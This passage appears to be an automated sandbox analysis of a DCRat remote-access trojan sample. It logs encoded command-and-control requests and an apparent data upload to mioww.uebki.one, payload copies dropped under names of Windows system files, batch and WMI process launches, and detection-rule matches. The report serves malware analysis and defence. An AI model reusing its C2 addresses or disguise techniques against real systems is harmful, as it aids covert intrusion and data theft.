aPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN
4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.one
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.one
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljS5FWe5c1VmRGWa9UOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETpdmaOdXQqxEMjRFTz1kaNh3Yqx0dRpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5FWe5c1VnNGWa9kSp9Ua0IjYwR2ValnSDxUaz12Y2xmRJNjVtRVavpWS1IFWhpmSDxUaNpXT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1keNFTWq1UeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI4MjZkJzNyIGNmBTYiNjNjRDZ3cjYkFGN3QTYllTYzUWOiFDZhF2YjJiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN
4M2Yis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: mioww.uebki.oneConnection: Keep-Alive
                            Source: global traffic DNS traffic detected: DNS query: mioww.uebki.one
                            Source: unknown HTTP traffic detected: POST /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY HTTP/1.1 Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryLi196lcbgF3BNosl User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: mioww.uebki.one Content-Length: 81424 Expect: 100-continue Connection: Keep-Alive
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mioww.uH
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mioww.uHrF
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002CEF000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002A60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mioww.uebki.one
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mioww.uebki.one/
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mioww.uebki.one/L1nc0In.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mioww.uebki.one/L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZ
                            Source: jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mioww.uebki.oneesda
                            Source: dmhu7oz5yP.exe, 00000000.00000002.1672344237.0000000002794000.00000004.00000800.00020000.00000000.sdmp, jnTUlYyDyuybgXdgxhTkT.exe, 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Window created: window name: CLIPBRDWNDCLASS

                            System Summary

                            Source: dmhu7oz5yP.exe, type: SAMPLE Matched rule: DCRat payload Author: ditekSHen
                            Source: 0.0.dmhu7oz5yP.exe.2b0000.0.unpack, type: UNPACKEDPE Matched rule: DCRat payload Author: ditekSHen
                            Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, type: DROPPED Matched rule: DCRat payload Author: ditekSHen
                            Source: C:\Users\Default\RuntimeBroker.exe, type: DROPPED Matched rule: DCRat payload Author: ditekSHen
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPED Matched rule: DCRat payload Author: ditekSHen
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, type: DROPPED Matched rule: DCRat payload Author: ditekSHen
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPED Matched rule: DCRat payload Author: ditekSHen
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Process Stats: CPU usage > 49%
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe\:Zone.Identifier:$DATA
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\SoftwareDistribution\7bcc3440f42388
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe\:Zone.Identifier:$DATA
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Help\OEM\ContentStore\7bcc3440f42388
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe\:Zone.Identifier:$DATA
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Migration\WTR\7bcc3440f42388
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Media\WinStore.App.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Media\WinStore.App.exe\:Zone.Identifier:$DATA
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Windows\Media\fd168b19609dff
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Code function: 0_2_00007FFD9B8A0F88
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Code function: 0_2_00007FFD9B8B21F2
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Code function: 0_2_00007FFD9B8B061D
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Code function: 0_2_00007FFD9B8B0D9A
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe Code function: 16_2_00007FFD9B885141
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe Code function: 17_2_00007FFD9B890F88
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Code function: 19_2_00007FFD9B895141
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Code function: 19_2_00007FFD9B8B0C61
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Code function: 19_2_00007FFD9B8BDCC8
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Code function: 21_2_00007FFD9B885141
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Code function: 23_2_00007FFD9B880F88
                            Source: C:\Users\Public\Libraries\RuntimeBroker.exe Code function: 25_2_00007FFD9B8B0F88
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Code function: 40_2_00007FFD9B885141
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Code function: 41_2_00007FFD9B895141
                            Source: dmhu7oz5yP.exe Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: jnTUlYyDyuybgXdgxhTkT.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: WinStore.App.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: RuntimeBroker.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: RuntimeBroker.exe0.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: upfc.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: dmhu7oz5yP.exe, 00000000.00000002.1674023685.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs dmhu7oz5yP.exe
                            Source: dmhu7oz5yP.exe, 00000000.00000000.1640788306.0000000000302000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs dmhu7oz5yP.exe
                            Source: dmhu7oz5yP.exe Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs dmhu7oz5yP.exe
                            Source: dmhu7oz5yP.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: dmhu7oz5yP.exe, type: SAMPLE Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: 0.0.dmhu7oz5yP.exe.2b0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe, type: DROPPED Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Users\Default\RuntimeBroker.exe, type: DROPPED Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Windows\Media\WinStore.App.exe, type: DROPPED Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, type: DROPPED Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, type: DROPPED Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
                            Source: dmhu7oz5yP.exe, Q69.cs Cryptographic APIs: 'TransformBlock'
                            Source: dmhu7oz5yP.exe, Q69.cs Cryptographic APIs: 'TransformFinalBlock'
                            Source: dmhu7oz5yP.exe, Q69.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                            Source: WinStore.App.exe.0.dr, Q69.cs Cryptographic APIs: 'TransformBlock'
                            Source: WinStore.App.exe.0.dr, Q69.cs Cryptographic APIs: 'TransformFinalBlock'
                            Source: WinStore.App.exe.0.dr, Q69.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                            Source: RuntimeBroker.exe0.0.dr, Q69.cs Cryptographic APIs: 'TransformBlock'
                            Source: RuntimeBroker.exe0.0.dr, Q69.cs Cryptographic APIs: 'TransformFinalBlock'
                            Source: RuntimeBroker.exe0.0.dr, Q69.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                            Source: dmhu7oz5yP.exe (277.cs, kJk.cs, Ba5.cs) Base64 encoded strings found
                            Source: WinStore.App.exe.0.dr (277.cs, kJk.cs, Ba5.cs) Base64 encoded strings found
                            Source: RuntimeBroker.exe0.0.dr (277.cs, kJk.cs, Ba5.cs) Base64 encoded strings found
                            Source: upfc.exe.0.dr (277.cs, kJk.cs, Ba5.cs) Base64 encoded strings found
                            Source: RuntimeBroker.exe0.0.dr, x6e.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: RuntimeBroker.exe0.0.dr, x6e.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: dmhu7oz5yP.exe, x6e.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: dmhu7oz5yP.exe, x6e.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: upfc.exe.0.dr, x6e.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: upfc.exe.0.dr, x6e.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: WinStore.App.exe.0.dr, x6e.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: WinStore.App.exe.0.dr, x6e.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engine Classification label: mal100.troj.evad.winEXE@45/35@1/1
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Users\Default User\RuntimeBroker.exe
                            Source: C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\608f26fd9e29f1ff73c212518da1477c6985de50
                            Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File created: C:\Users\user\AppData\Local\Temp\YswW7Dcfvg
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat"
                            Source: dmhu7oz5yP.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: dmhu7oz5yP.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File read: C:\Users\desktop.ini
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: dmhu7oz5yP.exe ReversingLabs: Detection: 78%
                            Source: dmhu7oz5yP.exe Virustotal: Detection: 80%
                            Source: C:\Users\user\Desktop\dmhu7oz5yP.exe File read: C:\Users\user\Desktop\dmhu7oz5yP.exe
                            Source: unknown Process created: C:\Users\user\Desktop\dmhu7oz5yP.exe "C:\Users\user\Desktop\dmhu7oz5yP.exe"
